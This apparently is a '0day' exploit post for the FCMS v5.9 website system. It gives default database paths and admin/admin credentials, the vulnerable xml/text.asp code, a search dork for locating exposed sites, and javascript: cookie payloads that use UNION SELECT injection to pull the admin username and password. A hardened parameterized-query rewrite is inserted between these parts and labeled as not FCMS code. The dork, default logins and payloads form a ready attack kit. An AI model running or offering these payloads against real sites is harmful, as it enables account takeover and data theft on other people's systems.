Dream Flash website management system FCMS v5.9: latest 0day vulnerability
Database path: xmlEditor/database/####@@@datas.mdb
Admin backend: xmleditor/login.asp (admin/admin)
Guestbook database: guestbook/db/sywl.asp
Cookie injection vulnerability
Vulnerable file:
xml/text.asp
Vulnerable code:
<!--#include file="…/conn.asp"-->
<%
' conn.asp contains the filter for GET and POST input, but it ignores cookies.
flowNo = Request("flowNo") ' Request() does not read only GET and POST; it also reads cookies
If flowNo <> "" Then ' the query runs whenever flowNo is not empty
    Set rs = Server.CreateObject("ADODB.RecordSet")
    ' flowNo is concatenated into the SQL text unchanged (the injection point)
    rs.Source = "select * from xmlContent where flowNo=" & flowNo
    rs.Open rs.Source, conn, 1, 1
    ' XML output: the leaked data appears inside the <title> element
    Response.Write "<?xml version='1.0' encoding='utf-8'?>" & Chr(13)
    Response.Write "<main>" & Chr(13)
    Response.Write "<title><![CDATA["
    Response.Write rs("tx")
    Response.Write "]]></title>" & Chr(13)
    Response.Write "<text><![CDATA["
    Response.Write rs("description")
    Response.Write "]]></text>" & Chr(13)
    rs.Close
    Set rs = Nothing
    conn.Close
    Set conn = Nothing
    Response.Write "</main>"
End If
%>
Brief description: the same cookie injection vulnerability also exists in the new.asp file in the root directory, but it is inconvenient to use there because that file has a custom redirect to the home page. The text.asp file has no redirect or anything similar, so it is easy to use.
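For comparison, a hardened version of the same lookup, as an added example that is not FCMS code. It assumes conn is the open ADODB.Connection provided by the conn.asp include, that flowNo is an integer key, and that legitimate clients send it in the query string.

```asp
<%
' Added example (not FCMS code): hardened version of the xml/text.asp lookup.
' Assumptions: conn is the open ADODB.Connection from the conn.asp include,
' flowNo is an integer key, and legitimate clients send it in the query string.

' Name the collection explicitly. Request("flowNo") searches QueryString,
' Form and then Cookies, so a cookie value reaches the query when the
' parameter is absent from the URL and the form body.
rawFlowNo = Trim(Request.QueryString("flowNo"))

' Allow 1 to 9 decimal digits only, so the value always fits a Long.
Set digitsOnly = New RegExp
digitsOnly.Pattern = "^[0-9]{1,9}$"
If Not digitsOnly.Test(rawFlowNo) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

' Bind the value as a typed parameter instead of concatenating it into SQL.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1 ' adCmdText
cmd.CommandText = "select tx, description from xmlContent where flowNo = ?"
' 3 = adInteger, 1 = adParamInput
cmd.Parameters.Append cmd.CreateParameter("flowNo", 3, 1, , CLng(rawFlowNo))
Set rs = cmd.Execute

Response.ContentType = "text/xml"
Response.Write "<?xml version='1.0' encoding='utf-8'?>" & vbCrLf
Response.Write "<main>" & vbCrLf
If Not rs.EOF Then ' an unknown flowNo yields an empty <main>, not an error
    Response.Write "<title><![CDATA[" & rs("tx") & "]]></title>" & vbCrLf
    Response.Write "<text><![CDATA[" & rs("description") & "]]></text>" & vbCrLf
End If
Response.Write "</main>"

rs.Close
Set rs = Nothing
conn.Close
Set conn = Nothing
%>
```

The same change applies to new.asp, which has the same flaw. Extending the conn.asp filter to Request.Cookies adds a second layer but does not replace the parameterized query.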
Keywords: inurl:"xmleditor/login.asp"
EXP:
javascript:alert(document.cookie="flowNo="+escape("1 4 union select 1,2,3,adminname from XmlAdmin"));
javascript:alert(document.cookie="flowNo="+escape("1 4 union select 1,2,3,adminpwd from XmlAdmin"));
PS: note that the result of this EXP does not appear in the page body. The page is blank; the leaked account name and password appear in the title element. Look carefully.
Sleep~!